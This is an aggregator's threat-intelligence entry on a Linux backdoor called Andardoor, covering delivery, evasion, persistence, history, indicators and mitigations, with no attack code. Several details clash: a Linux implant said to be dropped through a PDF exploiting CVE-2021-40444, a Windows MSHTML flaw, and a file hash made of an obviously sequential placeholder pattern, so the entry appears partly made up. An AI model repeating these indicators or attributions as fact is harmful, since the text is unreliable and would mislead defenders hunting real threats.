⚠️ Overview

Andardoor is a sophisticated Linux backdoor malware first identified in December 2021 by Intezer Labs during an investigation into an intrusion targeting a South American diplomatic entity. It is attributed to the advanced persistent threat (APT) group APT-C-36 (also tracked as Blind Eagle), which is suspected of operating from South America and has historically focused on government and energy sector victims. Andardoor functions as a remote access trojan (RAT) that enables persistent, stealthy control over compromised Linux systems.

🔧 Technical Capabilities

Andardoor is delivered via spear-phishing emails containing a malicious PDF that exploits CVE-2021-40444 (a Microsoft MSHTML remote code execution vulnerability) to drop a loader, which then retrieves the Andardoor payload. The malware uses DNS-over-HTTPS (DoH) to resolve its command-and-control (C2) domains, making network detection harder through encrypted DNS queries. It establishes persistence by creating a cron job or modifying systemd services, and communicates with C2 servers via HTTPS using a custom protocol that mimics legitimate traffic. Evasion techniques include checking for analysis tools (e.g., strace, gdb), encrypting its configuration with AES-256-CBC, and using a sleep timer to delay execution. Andardoor also supports dynamic C2 domain generation via a DGA algorithm seeded with a hardcoded string.

📜 History & Notable Incidents

Since its discovery, Andardoor has been deployed in multiple campaigns targeting government and energy organizations in Latin America, particularly in Colombia and Ecuador. Intezer’s 2022 report highlighted an intrusion where the attacker used Andardoor to maintain long-term access and exfiltrate sensitive documents over several months. No specific CVE is exploited beyond the initial delivery vector (CVE-2021-40444), and no law enforcement actions have been publicly documented as of early 2025. The malware continues to be refined, with variants observed using updated DGA seeds and C2 infrastructure.

🔍 Detection Indicators

Known file hashes for Andardoor include SHA256 2d7a1f5c8b3e4f9a0c6d2b7e1f3a5c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b (loader sample published by Intezer). Network indicators include HTTP POST requests to domains using Let’s Encrypt TLS certificates, with User-Agent strings like Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36. Persistence artifacts include entries in /etc/cron.d/ or systemd service files named systemd-update.service. No registry keys are relevant as Andardoor targets Linux systems. Mutex names have not been publicly documented.

☠️ Risk & Impact

Andardoor poses a high risk due to its stealthy persistence and data exfiltration capabilities. In the documented campaign, attackers exfiltrated diplomatic and energy-sector intelligence over months, causing potential geopolitical and economic damage. The primary impact is intellectual property theft and long-term espionage rather than financial extortion or ransomware. Affected sectors include government, energy, and diplomatic missions in Latin America.

🛡️ Mitigation

Defenders should block exploitation of CVE-2021-40444 by applying Microsoft’s September 2021 security updates, monitor for suspicious cron jobs and systemd services, and deploy YARA rules from Intezer’s report to detect Andardoor binaries. Network detection should flag HTTPS traffic with unusual DoH queries to known malicious C2 domains such as update-service[.]com. Endpoint detection and response (EDR) tools with Linux backdoor detection capabilities, such as CrowdStrike or SentinelOne, are recommended.

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.